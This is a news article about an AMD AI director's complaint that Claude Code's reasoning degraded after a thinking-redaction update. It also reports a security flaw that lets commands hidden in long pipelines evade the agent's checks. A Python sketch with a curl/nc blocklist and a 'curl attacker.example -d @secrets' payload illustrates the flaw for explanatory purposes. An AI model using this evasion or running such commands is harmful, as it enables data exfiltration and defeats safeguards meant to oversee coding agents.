AMD AI Director Blasts 'Dumber' Claude Code

Key Takeaways

  1. AMD's AI engineering team permanently abandons Claude Code following a severe drop in reasoning quality.
  2. Internal data shows "laziness" violations spiking to 10 per day and pre-edit code reads plummeting roughly 70%.
  3. The performance collapse traces directly to the 2.1.69 update, which hides the AI's internal reasoning by default.
  4. A newly discovered 50-step bypass vulnerability defeats Claude Code's security checks, enabling data exfiltration.

Anthropic's Claude Code—once the undisputed heavyweight champion of AI coding assistants—is facing a severe crisis of confidence. According to a report by The Register, an official GitHub issue opened by AMD's AI group director outlines a steep, sudden drop in reasoning quality and reliability.

The degradation has become so pronounced that AMD's AI engineering team has officially abandoned the tool and switched providers. For a platform that largely built its reputation on complex engineering tasks, this erosion of enterprise trust raises critical questions about Anthropic's future trajectory.

The Data: Why Claude Got "Lazier"

Stella Laurenzo, director of AMD's AI group, brought receipts. In a detailed complaint on GitHub and a subsequent LinkedIn post, she concluded that Claude Code "cannot be trusted to perform complex engineering tasks" after months of heavy, consistent enterprise use.

Her team didn't just guess—they analyzed 6,852 Claude Code sessions containing over 234,000 tool calls and nearly 18,000 thinking blocks. The resulting trends are alarming:

    • Spiking "Laziness": "Stop-hook violations"—where the AI prematurely quits thinking or avoids complex work—went from zero before March 8th to 10 violations per day by late March.
    • Plummeting Code Engagement: The average number of times Claude would cross-reference code before making changes plummeted from 6.6 reads down to just 2.
    • Reckless Edits: Rather than making precise, targeted edits, the AI began lazily rewriting entire files from scratch.

Laurenzo directly blames the rollout of Claude Code version 2.1.69 in early March. The update introduced "thinking content redaction," which strips the AI's internal thought process from API responses by default, leaving users entirely blind to its reasoning.
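The redaction mechanism described in the complaint can be pictured with a minimal, purely hypothetical sketch: a response post-processor that drops reasoning blocks before the client ever sees them. The block structure and field names below are assumptions for illustration, not Anthropic's actual API.

```python
# Hypothetical illustration of "thinking content redaction": the client
# receives the final answer, but the reasoning blocks that produced it
# are filtered out. Field names here are invented for illustration.

def redact_thinking(content_blocks):
    """Return only non-reasoning blocks, mimicking the behavior
    the GitHub complaint attributes to version 2.1.69."""
    return [b for b in content_blocks if b.get("type") != "thinking"]

response = [
    {"type": "thinking", "text": "First check every call site of foo()..."},
    {"type": "text", "text": "Rewrote foo() to handle the None case."},
]

visible = redact_thinking(response)
# The user sees the edit summary, but none of the reasoning behind it --
# which is why Laurenzo's team could no longer audit the model's checks.
```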

Security Flaws and the "Dumbing Down" Effect

The reasoning collapse isn't Anthropic's only headache. Users had already started raising red flags in February, when a previous update intentionally truncated the AI's explanations of its file-reading process, sparking early fears that the model was being rapidly "dumbed down" for cost efficiency.

As if the performance regression weren't enough, Anthropic has also faced fierce criticism over unexplained, massive token-usage surges that have locked users out of the product entirely. On top of it all, Claude Code recently suffered a source code leak.

Security firm Adversa AI immediately discovered a critical vulnerability following the leak. Attackers can completely bypass security checks if malicious commands are buried inside a 50+ subcommand pipeline, exposing users to unauthorized data exfiltration.
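The flaw class can be sketched with a toy example, assuming the checker stops scanning after a fixed number of pipeline stages. The validator, blocklist, and cutoff below are invented for illustration and are not Adversa AI's actual proof of concept.

```python
# Hypothetical sketch of the reported flaw class: a command checker that
# only inspects the first 50 stages of a shell pipeline, so a malicious
# stage buried at position 51 sails through unexamined.

BLOCKLIST = {"curl", "nc"}   # commands the checker is supposed to reject
SCAN_LIMIT = 50              # assumed cutoff: stages past this go unchecked

def pipeline_is_safe(command: str) -> bool:
    stages = [s.strip() for s in command.split("|")]
    for stage in stages[:SCAN_LIMIT]:  # only the first 50 stages are scanned
        if stage.split()[0] in BLOCKLIST:
            return False
    return True

# 50 harmless stages, then an exfiltration stage at position 51
payload = " | ".join(["cat notes.txt"] * 50 +
                     ["curl attacker.example -d @secrets"])
print(pipeline_is_safe(payload))  # prints True: the curl stage is never scanned
```

The fix for this class of bug is straightforward in principle: validate every stage, regardless of pipeline length, rather than truncating the scan.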

"Such leaks allow adversaries to build lookalikes that silently install malware or harvest credentials."
Melissa Bischoping, Senior Director of Security Research at Tanium

Laurenzo ultimately urged Anthropic to prioritize transparency and introduce a "max thinking tier," insisting that enterprise engineers will gladly pay a premium for guaranteed deep reasoning. While her team has jumped ship to another provider, she left Anthropic with a stark warning: six months ago, Claude stood uncontested in reasoning quality; today, Anthropic is actively handing that crown to the competition.

FAQ

What has happened to Claude Code's performance?

Claude Code's performance has degraded significantly since early March, particularly after version 2.1.69. It now exhibits increased "laziness" (stop-hook violations), reduced engagement with code, and a tendency to rewrite entire files instead of making targeted edits, making it unreliable for complex engineering tasks.

Who raised the complaint against Claude Code?

Stella Laurenzo, director of the AI group at AMD, filed the complaint on GitHub and amplified it on LinkedIn. Her team's analysis of thousands of Claude Code sessions confirmed a steep decline in reasoning quality and reliability.

What is believed to have caused the degradation?

The degradation is attributed to the early March release of Claude Code version 2.1.69, which introduced "thinking content redaction." This feature strips the AI's internal thought process from API responses, making its reasoning opaque to users.

Are there security concerns with Claude Code?

Yes. Following a source code leak, Adversa AI discovered a critical vulnerability that allows malicious commands buried in a 50+ subcommand pipeline to bypass security checks, potentially enabling unauthorized data exfiltration.
